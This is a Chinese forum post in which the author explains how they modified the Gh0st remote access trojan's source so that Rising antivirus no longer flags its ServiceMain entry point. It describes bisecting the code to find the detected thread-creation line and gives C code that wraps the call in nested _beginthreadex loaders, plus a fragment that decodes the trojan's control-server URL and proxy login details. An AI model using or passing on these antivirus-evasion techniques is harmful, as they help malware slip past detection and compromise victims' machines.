申请邀请码 文章二
   
     最近几天做Gh0st免杀，在做到瑞星免杀时，碰到一个有些棘手的问题，输出表中ServiceMain总是被杀，新增输出函数还是移动位置都会被杀。本人前几天还上看雪咨询了一下，见帖 http://bbs.pediy.com/showthread.php?t=114979
     由于是做源代码免杀，而且要对gh0st做很多改动，加上本人非常讨厌非驱动类程序里面夹杂asm代码，所以实在不想用什么函数名加密法。于是只能硬着头皮研究一下瑞星查杀的特点。

    首先找出几个系统自带的由svchost启动的服务dll，分析其ServiceMain入口，对比gh0st的情况，发现没什么两样，然后用瑞星查杀一下，没报为病毒。这情况说明瑞星杀ServiceMain还有别的条件在里面，那别的条件是什么呢？于是我再次打开gh0st工程，找到ServiceMain函数入口，怎么分析呢，还是一段一段代码检查吧！

    第1步将该函数所有实现代码全注释掉，编译用瑞星查杀，发现瑞星没报病毒，看来分析思路是对的。
    第2步从上到下每次开启一部分代码进行编译，然后用瑞星查杀，最后发现下面这行代码开启的时候，瑞星肯定会报病毒
   

 HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL);

    HANDLE xxyy ()
    {
    	HANDLE	hThread = INVALID_HANDLE_VALUE;

	_beginthreadex(NULL, 
		0, 
		MS_ThreadLoader, 
		&hThread,
		0, 
		NULL
		);
    }

    unsigned int __stdcall MS_ThreadLoader(LPVOID param)
    {
	HANDLE* pHThread = (HANDLE*)param;
	*pHThread = (HANDLE)_beginthreadex(NULL, 
		0, 
		XX_ThreadLoader, 
		param,
		0, 
		NULL
		);

	return 0;
    }

    unsigned int __stdcall XX_ThreadLoader(LPVOID param)
    {
	unsigned int	nRet = 0;
#ifdef _DLL
	try
	{
#endif	
        main(param);
#ifdef _DLL
	}catch(...){};
#endif
	return nRet;
     }

SetUnhandledExceptionFilter(bad_exception);

if (!getLoginInfo(MyDecode(lpURL + 6), &lpszHost, &dwPort, &lpszProxyHost, 
				&dwProxyPort, &lpszProxyUser, &lpszProxyPass))

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课